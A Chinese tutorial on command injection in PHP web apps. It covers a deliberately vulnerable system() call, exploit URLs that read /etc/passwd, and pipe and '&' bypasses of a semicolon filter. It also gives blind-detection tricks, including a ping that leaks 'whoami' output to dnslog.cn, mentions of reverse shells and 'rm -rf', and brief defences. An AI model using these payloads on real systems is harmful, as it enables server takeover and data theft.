1、概述
定义: 用户提交的数据被服务器处理引擎当作系统命令语句片段执行。
分类: Web通用漏洞
风险等级: 严重/高危
危害: 可直接控制服务器/可通过提权控制服务器
别名: 命令注入/RCE(Remote_Command_Execution)
2、漏洞原理+利用
漏洞示例:
<?php print system("uname -".$_GET['a']);?>
漏洞利用:
在传入参数后面跟上命令查看passwd文件http://xxx.com/rce.php/?a=1 ;cat /etc/passwd
常见限制: 通过限制 ; 来防御
<?php
if(strstr($_GET['a'],";")){
die("error");
}
system("uname-".$_GET['a']);
?>
绕过 : 管道符/and符&(%26)
绕过
http://xxx.com/rce.php/?a=1 | cat /etc/passwd
http://xxx.com/rce.php/?a=1%20%26%20cat /etc/passwd
3、漏洞挖掘
常见位置: 参数值、Cookie值、X-Forwarded-For、Referer、User-Agent、Host。
理论上,命令注入点(注点)存在于HTTP请求的任何位置。
有回显的命令注入判断:
- 通过读取系统中已存在的文件判断
cat /etc/passwd
- 使用一些基础命令
whoami
,ls
......
无回显命令注入判断:
- 通过在web目录写入文件然后再访问, 例如:
echo ‘test’ > ‘/var/www/html/1.txt’
- 使用curl 、DNS解析,例如:
ping ‘whoami’.dnslog.cn
- SLEEP感知 (SLEEP 3)
- 反弹shell
- reboot
- rm -rf (慎用)
Tips:优先使用$(xxx) , 因为在执行过程中其优先级较高。另外IFS 相当于Linux shell下的空格字符,例如 catIFS/etc/passwd
4、漏洞防御
curl "http://www.aaa.cn/zh/"
curl ----命令
“http://www.aaa.cn/zh/” ----参数
方法一: 使用硬编码
将参数固定,避免直接读取用户提交数据。
方法二: 如命令/代码确实需要动态调整,可将内容固定为一个选择列表
例如: 1 whoami 2 ipconfig 3 ls
然后限定用户提交参数为整型(intval强制转换),根据对应关系执行命令/代码具体内容。
方法三: 对于内容不固定的可变参数,应当进行严格过滤,过滤方法可参考SQL注入防护策略,将两端使用引号闭合,然后对所有内容进行转意义。
方法四: 禁止可变命令